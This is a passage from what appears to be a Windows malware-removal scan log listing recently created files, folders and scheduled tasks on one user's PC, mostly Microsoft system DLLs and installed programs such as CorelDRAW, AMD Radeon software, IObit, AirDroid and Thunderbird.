2020-08-20 21:05 - 2020-08-20 21:05 - 000020480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dplaysvr.exe
2020-08-20 21:05 - 2020-08-20 21:05 - 000010240 _____ (Microsoft Corporation) C:\Windows\system32\dpnhupnp.dll
2020-08-20 21:05 - 2020-08-20 21:05 - 000010240 _____ (Microsoft Corporation) C:\Windows\system32\dpnhpast.dll
2020-08-20 21:05 - 2020-08-20 21:05 - 000008192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dpnhupnp.dll
2020-08-20 21:05 - 2020-08-20 21:05 - 000008192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dpnhpast.dll
2020-08-20 21:05 - 2020-08-20 21:05 - 000006144 _____ (Microsoft Corporation) C:\Windows\system32\dpnlobby.dll
2020-08-20 21:05 - 2020-08-20 21:05 - 000006144 _____ (Microsoft Corporation) C:\Windows\system32\dpnaddr.dll
2020-08-20 21:05 - 2020-08-20 21:05 - 000005120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dpnlobby.dll
2020-08-20 21:05 - 2020-08-20 21:05 - 000005120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dpnaddr.dll
2020-08-20 19:38 - 2020-08-20 19:38 - 000001692 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Angry Birds Rio.lnk
2020-08-20 19:38 - 2020-08-20 19:38 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Rovio
2020-08-20 18:45 - 2020-08-20 18:45 - 000000000 ____D C:\Users\Hetitor\AppData\Local\CEF
2020-08-20 13:52 - 2020-08-20 16:55 - 000002516 _____ C:\Windows\system32\Tasks\AMDLinkUpdate
2020-08-20 13:52 - 2020-08-20 13:52 - 000003130 _____ C:\Windows\system32\Tasks\AMDInstallLauncher
2020-08-20 13:09 - 2020-08-20 13:09 - 002510856 _____ (Microsoft Corporation) C:\Windows\system32\mcupdate_GenuineIntel.dll
2020-08-20 13:06 - 2020-08-25 08:43 - 000000000 ____D C:\Users\Hetitor\AppData\Roaming\IObit
2020-08-20 13:06 - 2020-08-25 08:42 - 000000000 ____D C:\Users\Hetitor\AppData\LocalLow\IObit
2020-08-20 13:06 - 2020-08-25 08:42 - 000000000 ____D C:\ProgramData\IObit
2020-08-20 13:06 - 2020-08-21 16:44 - 000000000 ____D C:\ProgramData\ProductData
2020-08-20 13:06 - 2020-08-20 13:06 - 000000000 ____D C:\Windows\Tasks\ImCleanDisabled
2020-08-20 13:06 - 2020-08-20 13:06 - 000000000 ____D C:\ProgramData\{F86B0233-9A85-4589-8AAF-524CC4F8211B}
2020-08-20 12:53 - 2020-08-20 12:53 - 000000000 ____D C:\Users\Hetitor\AppData\Roaming\TeamViewer
2020-08-20 12:53 - 2020-08-20 12:53 - 000000000 ____D C:\Users\Hetitor\AppData\Local\TeamViewer
2020-08-20 12:03 - 2020-08-20 13:51 - 000000000 ____D C:\Users\Hetitor\AppData\Roaming\SmartGenius
2020-08-20 11:54 - 2020-08-24 11:54 - 000000000 ____D C:\Users\Hetitor\AppData\Roaming\AirDroid
2020-08-20 11:54 - 2020-08-20 11:54 - 000000000 ____D C:\Users\Public\Documents\AirDroid
2020-08-20 11:54 - 2020-08-20 11:54 - 000000000 ____D C:\Users\Hetitor\Documents\AirDroid
2020-08-20 11:54 - 2020-08-20 11:54 - 000000000 ____D C:\ProgramData\AirDroid
2020-08-20 11:50 - 2020-08-20 11:52 - 000000000 ____D C:\Users\Hetitor\AppData\Local\FileSearchy
2020-08-20 11:27 - 2020-08-28 16:45 - 000000000 ___HD C:\.tmp.drivedownload
2020-08-20 11:27 - 2020-08-20 11:27 - 000000000 ___HD C:\Users\Hetitor\Documents\.tmp.drivedownload
2020-08-20 11:26 - 2020-08-20 11:27 - 000000000 ___RD C:\Users\Hetitor\Google Drive
2020-08-20 11:23 - 2020-08-20 11:23 - 000000550 _____ C:\Users\Hetitor\PD_regS.dbf
2020-08-20 11:23 - 2020-08-20 11:23 - 000000512 _____ C:\Users\Hetitor\PD_regS.dbt
2020-08-20 11:22 - 2020-08-20 11:22 - 000000000 __SHD C:\Users\Hetitor\AppData\Roaming\Common
2020-08-20 11:22 - 2020-08-20 11:22 - 000000000 ____D C:\Users\Hetitor\AppData\Roaming\AMPSoft
2020-08-20 11:22 - 2020-08-20 11:22 - 000000000 ____D C:\Users\Hetitor\AppData\Local\FileSeek
2020-08-20 11:22 - 2020-08-20 11:22 - 000000000 ____D C:\Users\Hetitor\AppData\Local\Binary_Fortress_Software
2020-08-20 11:22 - 2020-08-20 11:22 - 000000000 ____D C:\ProgramData\Binary Fortress Software
2020-08-20 10:45 - 2020-08-20 10:45 - 000000000 ____D C:\Users\Hetitor\AppData\Local\OneDrive
2020-08-19 23:44 - 2020-08-19 23:44 - 000001264 _____ C:\Users\Hetitor\Desktop\skin.lnk
2020-08-19 23:40 - 2020-08-19 23:40 - 000000000 ____D C:\Users\Hetitor\AppData\Local\Macromedia
2020-08-19 23:31 - 2020-08-19 23:31 - 000000000 ____D C:\Users\Hetitor\AppData\Roaming\Marine Aquarium 3
2020-08-19 20:11 - 2020-08-20 20:43 - 000000000 ____D C:\Users\Hetitor\AppData\Roaming\Rovio
2020-08-19 18:35 - 2020-08-19 18:35 - 000000000 ____D C:\Users\Hetitor\Documents\Corel
2020-08-19 18:02 - 2020-08-19 18:02 - 000000000 ____D C:\Program Files (x86)\gs
2020-08-19 18:01 - 2020-08-19 18:36 - 000000000 ____D C:\Program Files (x86)\Corel
2020-08-19 18:01 - 2020-08-19 18:01 - 000000000 ____D C:\Program Files\Common Files\Corel
2020-08-19 18:00 - 2020-08-19 18:39 - 000000000 ____D C:\ProgramData\Corel
2020-08-19 18:00 - 2020-08-19 18:06 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CorelDRAW Graphics Suite 2020 (64-bit)
2020-08-19 18:00 - 2020-08-19 18:01 - 000000000 ____D C:\Program Files\Corel
2020-08-19 17:58 - 2020-08-19 17:58 - 000000000 ____D C:\ProgramData\UniqueId
2020-08-19 17:47 - 2020-08-30 23:59 - 000000000 ____D C:\Graficadores
2020-08-19 16:40 - 2020-08-19 16:40 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Rico Software
2020-08-19 16:06 - 2020-08-19 18:35 - 000000000 ____D C:\Users\Hetitor\AppData\Roaming\Corel
2020-08-19 13:03 - 2020-08-19 13:03 - 000000000 ____D C:\Users\Hetitor\AppData\Roaming\GoldWave
2020-08-19 11:51 - 2020-08-19 11:51 - 000000000 ____D C:\Users\Hetitor\Documents\MemoriesOnTV
2020-08-19 11:50 - 2020-08-19 11:50 - 000000000 ____D C:\Users\Hetitor\AppData\Roaming\Nuance
2020-08-19 00:31 - 2020-08-30 23:58 - 000000000 ____D C:\Users\Hetitor\AppData\Roaming\vlc
2020-08-19 00:31 - 2020-08-19 00:31 - 000000000 ____D C:\Users\WDAGUtilityAccount\AppData\Roaming\vlc
2020-08-19 00:31 - 2020-08-19 00:31 - 000000000 ____D C:\Users\WDAGUtilityAccount
2020-08-19 00:31 - 2020-08-19 00:31 - 000000000 ____D C:\Users\Invitado\AppData\Roaming\vlc
2020-08-19 00:31 - 2020-08-19 00:31 - 000000000 ____D C:\Users\Invitado
2020-08-19 00:31 - 2020-08-19 00:31 - 000000000 ____D C:\Users\hldf\AppData\Roaming\vlc
2020-08-19 00:31 - 2020-08-19 00:31 - 000000000 ____D C:\Users\hldf
2020-08-19 00:31 - 2020-08-19 00:31 - 000000000 ____D C:\Users\Hetitor\AppData\Local\DFX
2020-08-19 00:31 - 2020-08-19 00:31 - 000000000 ____D C:\Users\DefaultAccount\AppData\Roaming\vlc
2020-08-19 00:31 - 2020-08-19 00:31 - 000000000 ____D C:\Users\DefaultAccount
2020-08-19 00:31 - 2020-08-19 00:31 - 000000000 ____D C:\Users\Administrador\AppData\Roaming\vlc
2020-08-19 00:31 - 2020-08-19 00:31 - 000000000 ____D C:\Users\Administrador
2020-08-19 00:31 - 2020-08-19 00:31 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FxSound Enhancer
2020-08-19 00:30 - 2020-08-19 00:31 - 000000000 ____D C:\Program Files (x86)\DFX
2020-08-18 23:53 - 2020-08-18 23:53 - 000000000 ____D C:\ProgramData\VS Revo Group
2020-08-18 23:50 - 2020-08-18 23:50 - 000000000 ____D C:\Users\Hetitor\AppData\Local\VS Revo Group
2020-08-18 23:42 - 2020-08-27 12:48 - 000000000 ____D C:\ProgramData\Avanquest
2020-08-18 23:42 - 2020-08-18 23:42 - 000001666 _____ C:\ProgramData\Microsoft\Windows\Start Menu\PowerDesk 8.5.lnk
2020-08-18 23:42 - 2020-08-18 23:42 - 000000000 ____D C:\Users\Hetitor\AppData\Roaming\Avanquest
2020-08-18 23:42 - 2020-08-18 23:42 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avanquest
2020-08-18 23:25 - 2020-09-01 18:55 - 000000000 ____D C:\Users\Hetitor\AppData\Local\CrashDumps
2020-08-18 23:25 - 2020-08-26 18:07 - 000000000 ____D C:\ProgramData\Avanquest Software
2020-08-18 23:25 - 2020-08-26 17:59 - 000000000 ____D C:\Users\Public\Documents\Avanquest Software
2020-08-18 20:55 - 2020-08-28 16:45 - 000000000 ____D C:\HLDF
2020-08-18 16:59 - 2020-08-19 12:15 - 000000000 ____D C:\Users\Hetitor\AppData\Local\MegaDownloader
2020-08-18 15:10 - 2020-08-30 22:19 - 000000000 ____D C:\Users\Hetitor\AppData\Local\cache
2020-08-18 15:09 - 2020-08-20 16:55 - 000002448 _____ C:\Windows\system32\Tasks\ModifyLinkUpdate
2020-08-18 15:09 - 2020-08-20 16:55 - 000002182 _____ C:\Windows\system32\Tasks\StartDVR
2020-08-18 15:09 - 2020-08-18 15:09 - 000003160 _____ C:\Windows\system32\Tasks\StartCN
2020-08-18 15:09 - 2020-08-18 15:09 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Radeon Software
2020-08-18 15:07 - 2020-08-18 15:07 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMDBugReportTool
2020-08-18 15:07 - 2020-08-18 15:07 - 000000000 ____D C:\ProgramData\AMD
2020-08-18 14:44 - 2020-08-21 18:48 - 000000000 ____D C:\Program Files\AMD
2020-08-18 14:44 - 2020-08-18 14:44 - 000000000 ____D C:\Users\Hetitor\AppData\Local\RadeonInstaller
2020-08-18 14:43 - 2020-08-28 16:45 - 000000000 ____D C:\AMD
2020-08-18 12:16 - 2020-08-18 12:16 - 000000000 ____D C:\Users\Hetitor\AppData\Roaming\IrfanView
2020-08-18 10:39 - 2020-09-02 09:11 - 000000000 ____D C:\Users\Hetitor\AppData\Roaming\Ditto
2020-08-18 10:39 - 2020-08-26 17:58 - 000000000 ____D C:\ProgramData\Package Cache
2020-08-18 10:39 - 2020-08-18 10:39 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Ditto
2020-08-18 10:39 - 2020-08-18 10:39 - 000000000 ____D C:\Program Files (x86)\Ditto
2020-08-18 00:37 - 2020-08-18 00:37 - 000000000 ____D C:\ProgramData\ssh
2020-08-17 23:55 - 2020-09-02 09:13 - 000000000 ____D C:\Users\Hetitor\AppData\LocalLow\Mozilla
2020-08-17 23:55 - 2020-08-23 20:36 - 000000000 ____D C:\Users\Hetitor\AppData\Roaming\Mozilla
2020-08-17 23:55 - 2020-08-18 00:01 - 000000000 ____D C:\ProgramData\Mozilla
2020-08-17 23:55 - 2020-08-17 23:55 - 000000000 ____D C:\Users\Hetitor\AppData\Roaming\Thunderbird
2020-08-17 23:55 - 2020-08-17 23:55 - 000000000 ____D C:\Users\Hetitor\AppData\Local\Thunderbird
2020-08-17 23:55 - 2020-08-17 23:55 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2020-08-17 23:54 - 2020-09-01 14:07 - 000000000 ____D C:\UTILITARIOS
2020-08-17 23:42 - 2020-09-02 09:03 - 000004224 _____ C:\Windows\system32\Tasks\User_Feed_Synchronization-{C77CBFAE-2F67-42B1-A639-48430A42647C}
2020-08-17 23:42 - 2020-08-28 16:45 - 000000000 ____D C:\lotus
2020-08-17 23:42 - 2020-08-17 23:42 - 000001572 _____ C:\Windows\HRMY98.MIF
2020-08-17 23:42 - 2020-08-17 23:42 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\IBM Lotus Organizer 6
2020-08-17 23:42 - 2020-08-17 23:42 - 000000000 ____D C:\Program Files (x86)\OrgUpgrade
2020-08-17 21:33 - 2020-08-17 21:33 - 025903104 _____ (Microsoft Corporation) C:\Windows\system32\edgehtml.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 025444352 _____ (Microsoft Corporation) C:\Windows\system32\Hydrogen.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 022642688 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 019852288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\edgehtml.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 019812352 _____ (Microsoft Corporation) C:\Windows\system32\HologramWorld.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 018032128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 014820352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.UI.Xaml.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 011608064 _____ (Microsoft Corporation) C:\Windows\system32\wmp.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 009932088 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 009712640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmp.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 008015872 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 007823912 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Media.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 007758848 _____ (Microsoft Corporation) C:\Windows\system32\Chakra.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 007604584 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Media.Protection.PlayReady.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 007270912 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 007012864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstscax.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 006710272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\BingMaps.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 006526448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Media.Protection.PlayReady.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 006436864 _____ (Microsoft Corporation) C:\Windows\system32\twinui.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 006294528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 006074552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\windows.storage.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 005946368 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Data.Pdf.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 005904896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Chakra.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 005865272 _____ (Microsoft Corporation) C:\Windows\system32\spwizimg.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 005849872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3d10warp.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 005767224 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shell32.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 005502464 _____ (Microsoft Corporation) C:\Windows\system32\cdp.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 005195432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d2d1.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 005111296 _____ (Microsoft Corporation) C:\Windows\SysWOW64\twinui.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 005099384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Media.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 005040640 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 005013504 _____ (Microsoft Corporation) C:\Windows\system32\MFMediaEngine.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 005003824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.StateRepository.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 004859904 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 004611072 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 004538880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 004481536 _____ (Microsoft Corporation) C:\Windows\system32\DHolographicDisplay.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 004348408 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Mirage.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 004308480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cdp.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 004150272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.AI.MachineLearning.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 004129408 _____ (Microsoft Corporation) C:\Windows\system32\mfcore.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 003974376 _____ (Microsoft Corporation) C:\Windows\SysWOW64\explorer.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 003860832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rtmpltfm.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 003822592 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 003806208 _____ (Microsoft Corporation) C:\Windows\system32\diagtrack.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 003748352 _____ (Microsoft Corporation) C:\Windows\system32\SettingsHandlers_nt.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 003743056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\OneCoreUAPCommonProxyStub.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 003637760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MFMediaEngine.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 003525608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfcore.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 003516416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msi.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 003398656 _____ (Microsoft Corporation) C:\Windows\system32\MSVidCtl.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 003368616 _____ (Microsoft Corporation) C:\Windows\system32\combase.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 003243296 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Mirage.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 002986808 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tcpip.sys
2020-08-17 21:33 - 2020-08-17 21:33 - 002950808 _____ (Microsoft Corporation) C:\Windows\system32\mfmp4srcsnk.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 002875904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\esent.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 002861568 _____ (Microsoft Corporation) C:\Windows\system32\xpsservices.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 002831872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\CertEnroll.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 002800640 _____ (Microsoft Corporation) C:\Windows\system32\WinSAT.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 002799104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\win32kfull.sys
2020-08-17 21:33 - 2020-08-17 21:33 - 002774088 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 002766952 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 002755584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2020-08-17 21:33 - 2020-08-17 21:33 - 002755584 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2020-08-17 21:33 - 2020-08-17 21:33 - 002743808 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msftedit.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 002739200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\directml.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 002737664 _____ (Microsoft Corporation) C:\Windows\system32\WebRuntimeManager.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 002698048 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ntfs.sys
2020-08-17 21:33 - 2020-08-17 21:33 - 002588688 _____ (Microsoft Corporation) C:\Windows\system32\WMVDECOD.DLL
2020-08-17 21:33 - 2020-08-17 21:33 - 002583496 _____ (Microsoft Corporation) C:\Windows\SysWOW64\combase.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 002576896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DWrite.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 002561536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tquery.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 002494744 _____ (Microsoft Corporation) C:\Windows\system32\msmpeg2vdec.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 002490712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\CoreUIComponents.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 002422384 _____ (Microsoft Corporation) C:\Windows\system32\WMVCORE.DLL
2020-08-17 21:33 - 2020-08-17 21:33 - 002399232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AcGenral.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 002369576 _____ (Microsoft Corporation) C:\Windows\system32\Microsoft.Uev.AppAgent.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 002315680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msmpeg2vdec.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 002307584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WsmSvc.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 002305536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssrch.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 002281472 _____ (Microsoft Corporation) C:\Windows\system32\mmcndmgr.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 002259664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 002259192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVDECOD.DLL
2020-08-17 21:33 - 2020-08-17 21:33 - 002230240 _____ (Microsoft Corporation) C:\Windows\system32\mfasfsrcsnk.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 002224952 _____ (Microsoft Corporation) C:\Windows\system32\ResetEngine.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 002204160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MSVidCtl.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 002190648 _____ (Microsoft Corporation) C:\Windows\system32\AppVEntSubsystems64.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 002184504 _____ (Microsoft Corporation) C:\Windows\system32\workfolderssvc.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 002158080 _____ (Microsoft Corporation) C:\Windows\system32\Microsoft.Uev.ModernAppAgent.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 002147328 _____ (Microsoft Corporation) C:\Windows\system32\pnidui.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 002138280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVCORE.DLL
2020-08-17 21:33 - 2020-08-17 21:33 - 002132280 _____ (Microsoft Corporation) C:\Windows\system32\wsp_fs.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 002096128 _____ (Microsoft Corporation) C:\Windows\system32\ExplorerFrame.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 002085632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 002073176 _____ (Microsoft Corporation) C:\Windows\system32\mfplat.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 002031104 _____ C:\Windows\system32\rdpnano.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 002022400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\UIAutomationCore.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001999968 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001991592 _____ (Microsoft Corporation) C:\Windows\SysWOW64\twinapi.appcore.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001975808 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MapGeocoder.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001957008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3d11.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001952880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxml6.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001934824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AudioEng.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001893888 _____ (The ICU Project) C:\Windows\SysWOW64\icu.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001870200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfmp4srcsnk.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001856000 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001847808 _____ (Microsoft Corporation) C:\Windows\SysWOW64\xpsservices.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001845408 _____ (Microsoft Corporation) C:\Windows\system32\d3d9.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001836160 _____ (Microsoft Corporation) C:\Windows\system32\mfsrcsnk.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001835008 _____ (Microsoft Corporation) C:\Windows\system32\enterprisecsps.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001821696 _____ (Microsoft Corporation) C:\Windows\system32\CoreShell.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001803776 _____ (Microsoft Corporation) C:\Windows\system32\mmc.exe
2020-08-17 21:33 - 2020-08-17 21:33 - 001788728 _____ (Microsoft Corporation) C:\Windows\system32\wsp_health.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001770552 _____ (Microsoft Corporation) C:\Windows\system32\winmde.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001740800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\InstallService.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001719336 _____ (Microsoft Corporation) C:\Windows\system32\AppVEntVirtualization.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001704448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mmcndmgr.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001697792 _____ (Microsoft Corporation) C:\Windows\system32\msxml3.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001697792 _____ (Microsoft Corporation) C:\Windows\system32\GdiPlus.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001688064 _____ (Microsoft Corporation) C:\Windows\system32\XpsPrint.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001686016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001672544 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.ApplicationModel.Store.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001669344 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user32.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001665024 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001664896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001659408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Microsoft.Uev.AppAgent.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001654312 _____ (Microsoft Corporation) C:\Windows\system32\gdi32full.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001637888 _____ (Microsoft Corporation) C:\Windows\system32\quartz.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001637376 _____ (Microsoft Corporation) C:\Windows\system32\MSPhotography.dll
2020-08-17 21:33 - 2020-08-17 21:33 - 001616912 _____ (Microsoft Corporation) C:\Windows\system32\AppVIntegration.dll
